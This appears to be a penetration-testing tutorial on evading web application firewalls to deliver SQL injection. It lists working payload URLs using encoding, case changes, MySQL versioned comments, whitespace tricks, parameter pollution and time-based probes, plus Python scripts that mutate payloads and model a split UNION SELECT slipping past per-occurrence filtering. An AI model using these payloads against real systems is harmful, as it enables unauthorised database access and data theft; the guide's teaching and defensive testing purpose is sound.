TL;DR
Web Application Firewalls (WAFs) often block common SQL injection attempts. This guide shows techniques to bypass these filters, focusing on encoding, character manipulation, and alternative syntax. Remember ethical hacking principles – only test systems you have permission to access.
Understanding the Problem
A WAF sits between a user and a web server, inspecting incoming requests for malicious patterns (such as SQL injection). It is designed to block those requests before they reach the application and its database. Bypassing a WAF means finding a way to send SQL that the WAF does not recognise as harmful but that the database still executes as intended; this is possible because the WAF and the database parse the same bytes differently, and every technique below exploits one such difference. Keep in mind that a WAF is a compensating control: a successful bypass proves the injection flaw is still present, and the fix is parameterised queries in the application, not a longer block list.
Solution Guide
- Identify the filter rules: before attempting bypasses, send basic payloads to learn what the WAF blocks. Commonly blocked tokens are the keywords SELECT, UNION and DROP, the comment sequences -- and /* */, and often the single quote itself. Record what a block looks like (a 403, a captcha or a distinct block page) so that later you can tell "the WAF dropped it" apart from "the application rejected it".
- Character encoding: WAFs often decode a request differently from the web server or application behind them, sometimes once, sometimes not at all.
  - URL encoding: encode characters such as spaces (%20), single quotes (%27), double quotes (%22) and equals signs (%3D). Double encoding (%2527 for a single quote) targets filters that decode only once.
    http://example.com/page?id=1%27
  - Hex encoding: write string values as hexadecimal literals, which need no quote characters; in MySQL, 0x41 is the string 'A'.
    http://example.com/page?id=0x41
  - Unicode encoding: the %uXXXX form (%u0027 for a single quote) is non-standard, but some servers, notably IIS, still decode it, and a WAF that does not recognise it matches nothing.
    http://example.com/page?id=%u0027
- Case manipulation: some WAF rules are case-sensitive, while SQL keywords are not. Try variations such as SeLeCt, sElEcT or UnIoN.
  http://example.com/page?id=1 UnIoN SeLeCt * FROM users
- Comment exploitation: comments can stand in for whitespace, and some comment forms mean different things to the WAF and to the database.
  - Inline (versioned) comments: MySQL executes the contents of /*! ... */, while every other database treats it as an ordinary comment. A WAF that does not strip comments before matching sees no bare keyword.
    http://example.com/page?id=1 /*!UNION*/ /*!SELECT*/ * /*!FROM*/ users
  - Comments as separators: replace every space with a comment so that the keyword-space-keyword patterns a rule expects never occur. Genuinely nested comments (/* a /* b */ c */) are a separate case: PostgreSQL nests them, MySQL does not, so a WAF that assumes the wrong behaviour misjudges where the comment ends.
    http://example.com/page?id=1/* comment */UNION/* comment */SELECT/* comment */*/* comment */FROM/* comment */users
- Whitespace variations: rules that expect exactly one space between tokens miss other separators.
  - Multiple spaces: put several spaces between keywords and identifiers.
    http://example.com/page?id=1   UNION   SELECT * FROM users
  - Tab characters (%09): use tabs instead of spaces. MySQL also accepts %0a, %0b, %0c and %0d as whitespace, and parentheses can remove the need for whitespace entirely, as in UNION(SELECT ...).
    http://example.com/page?id=1%09UNION%09SELECT * FROM users
- Alternative syntax: find a different way to write a query that the rule set was not written for.
  - Hexadecimal representation of strings: a hex literal replaces a quoted string, not a keyword, so use it to drop the quotes a filter looks for; 0x61646d696e is 'admin' in MySQL.
    http://example.com/page?id=1 AND (SELECT 1 FROM users WHERE username=0x61646d696e)
  - Concatenation: string concatenation operators (|| in PostgreSQL and Oracle, + in SQL Server, CONCAT() in MySQL) let you build a value from pieces the filter never sees whole.
    http://example.com/page?id=1' AND username='ad'||'min' -- '
- HTTP parameter pollution (HPP): send the same parameter several times. Which value the application sees is platform-specific: PHP keeps the last occurrence, Java servlet containers return the first from getParameter(), and ASP.NET joins all occurrences with commas, so id=1&id=%27 becomes 1,' there. A WAF that inspects each occurrence on its own never sees the combined string.
  http://example.com/page?id=1&id=%27
- Time-based blind SQL injection: if nothing from the query is reflected in the response, infer it from response time. The example is MySQL-specific (IF() and SLEEP()); SQL Server uses WAITFOR DELAY and PostgreSQL pg_sleep().
  http://example.com/page?id=1' AND IF(SUBSTRING(VERSION(),1,1)='5',SLEEP(5),0)-- '
- Error-based SQL injection: if the application echoes database errors, craft payloads whose error text carries the data. Note that the example below is really a true/false probe, since the subquery changes the page content rather than producing an error; proper error-based extraction uses DBMS functions that place the value inside the error message, such as EXTRACTVALUE() in MySQL.
  http://example.com/page?id=1' AND (SELECT 1 FROM users WHERE username = 'admin')-- '
- Use Burp Suite or OWASP ZAP: Burp Intruder and ZAP's fuzzer replay one request with each encoding or obfuscation applied and let you sort the responses by status code and length; sqlmap's tamper scripts automate most of the transformations above.
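To see why the encoding, case, comment and whitespace tricks in the list work against a keyword rule, here is an added example in Python (not part of the original guide): a small mutator applies those transformations to one constructed payload and runs each result through a deliberately naive, single-decode, case-sensitive regex standing in for a WAF rule, then through a stricter rule that decodes twice and matches case-insensitively. The base payload, both rules and every function name are assumptions made for this illustration.

```python
# Added example, not from the original guide: payload mutator plus two stand-in WAF
# rules. The base payload, the rules and all names here are constructed for illustration.
import re
import urllib.parse

BASE = "1 UNION SELECT username, password FROM users"  # constructed sample payload

# Naive stand-in rule: case-sensitive, expects a literal space after the keyword,
# and the WAF applying it URL-decodes the value only once.
NAIVE_RULE = re.compile(r"(UNION|SELECT|DROP) |--")

# Stricter stand-in rule: case-insensitive, any whitespace or a comment opener
# after the keyword, and MySQL versioned comments are blocked outright.
STRICTER_RULE = re.compile(r"(UNION|SELECT|DROP)(\s|/\*)|--|/\*!", re.I)


def waf_blocks(raw: str, rule: re.Pattern, decode_rounds: int = 1) -> bool:
    """Apply `rule` to the value after `decode_rounds` rounds of URL decoding."""
    for _ in range(decode_rounds):
        raw = urllib.parse.unquote(raw)
    return rule.search(raw) is not None


def alternate_case(s: str) -> str:
    """SeLeCt-style case mutation; SQL keywords are case-insensitive."""
    return "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(s))


def mysql_versioned_comments(s: str) -> str:
    """Wrap each keyword in /*! ... */, which MySQL executes and other DBMSs ignore."""
    return re.sub(r"\b(UNION|SELECT|FROM)\b", r"/*!\1*/", s, flags=re.I)


def comments_as_separators(s: str) -> str:
    """Replace every space with an empty comment so 'KEYWORD ' never occurs."""
    return s.replace(" ", "/**/")


def tabs_for_spaces(s: str) -> str:
    """Send %09 (tab) where the rule expects a space; the database accepts both."""
    return s.replace(" ", "%09")


def double_url_encode(s: str) -> str:
    """Encode twice: a filter that decodes once sees %20, the application sees ' '."""
    return urllib.parse.quote(urllib.parse.quote(s, safe=""), safe="")


def hex_literal(s: str) -> str:
    """MySQL hex literal for a string, e.g. 'admin' -> 0x61646d696e (no quotes)."""
    return "0x" + s.encode().hex()


MUTATIONS = {
    "plain": lambda s: s,
    "case": alternate_case,
    "versioned comments": mysql_versioned_comments,
    "comments as separators": comments_as_separators,
    "tabs": tabs_for_spaces,
    "double url-encoding": double_url_encode,
}


def survivors(base: str = BASE, rule: re.Pattern = NAIVE_RULE, decode_rounds: int = 1) -> dict:
    """Return {mutation name: payload} for the mutations the given rule lets through."""
    return {
        name: fn(base)
        for name, fn in MUTATIONS.items()
        if not waf_blocks(fn(base), rule, decode_rounds)
    }


if __name__ == "__main__":
    print("Pass the naive rule:")
    for name, payload in survivors().items():
        print(f"  {name:24} {payload}")
    print("Pass the stricter rule (two decode rounds):",
          list(survivors(rule=STRICTER_RULE, decode_rounds=2)))
    print("hex literal for 'admin':", hex_literal("admin"))
```

Against the naive rule only the untouched payload is blocked; against the stricter rule with two decode rounds nothing in this set gets through. The stricter rule still misses plenty (parentheses instead of whitespace, %u encoding, hex literals in place of quoted strings), which is the practical point: a rule set is a moving target, so treat a block page as a signal during testing, not as proof the application is safe.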
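HTTP parameter pollution depends entirely on how the platform merges duplicate parameters, so here is an added example in Python (not from the original guide) that models the three documented behaviours named in the HPP item above and shows why a WAF that inspects each occurrence separately misses a payload that only becomes UNION SELECT once ASP.NET joins the values with a comma. The query strings, the stand-in rule and the function names are constructed for this illustration.

```python
# Added example, not from the original guide: model how duplicate query parameters are
# resolved on three platforms, and check a per-occurrence rule against the joined value.
# Query strings, rule and function names are constructed for illustration.
import re
from urllib.parse import parse_qsl


# Assumed behaviours, as documented for each platform:
#   php      -> $_GET keeps the last occurrence
#   servlet  -> getParameter() returns the first occurrence
#   aspnet   -> Request.QueryString joins all occurrences with commas
def resolve_duplicates(query: str, platform: str) -> dict:
    """Return the parameter map an application on `platform` would see."""
    seen = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if platform == "php":
            seen[key] = value
        elif platform == "servlet":
            seen.setdefault(key, value)
        elif platform == "aspnet":
            seen[key] = value if key not in seen else seen[key] + "," + value
        else:
            raise ValueError(f"unknown platform {platform!r}")
    return seen


# Stand-in WAF rule: UNION ... SELECT within one value.
UNION_SELECT = re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)

# Constructed HPP payload: neither occurrence alone contains UNION ... SELECT, but
# ASP.NET joins them as "1 UNION/*,*/SELECT ...", and the comma lands inside a comment.
SPLIT_QUERY = "id=1 UNION/*&id=*/SELECT username,password FROM users"


def blocked_per_occurrence(query: str, param: str = "id") -> bool:
    """A WAF that runs the rule over each occurrence of `param` separately."""
    return any(
        UNION_SELECT.search(value) is not None
        for key, value in parse_qsl(query, keep_blank_values=True)
        if key == param
    )


def blocked_after_join(query: str, platform: str = "aspnet", param: str = "id") -> bool:
    """The same rule run over the value the application actually receives."""
    return UNION_SELECT.search(resolve_duplicates(query, platform)[param]) is not None


if __name__ == "__main__":
    for platform in ("php", "servlet", "aspnet"):
        seen = resolve_duplicates("id=1&id=%27", platform)["id"]
        print(f"{platform:8} id=1&id=%27 -> {seen!r}")
    print("per-occurrence check blocks split payload:", blocked_per_occurrence(SPLIT_QUERY))
    print("same rule on the joined value blocks it:  ", blocked_after_join(SPLIT_QUERY))
```

The practical check this suggests: before relying on a WAF in front of an ASP.NET application, confirm whether it normalises duplicate parameters the same way the application does, because a per-occurrence rule and a join-then-inspect rule give opposite answers for the split payload above.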
Important Note: WAFs are constantly evolving. Techniques that work today may not work tomorrow. Ethical considerations are paramount – always obtain explicit permission before testing any system for vulnerabilities.

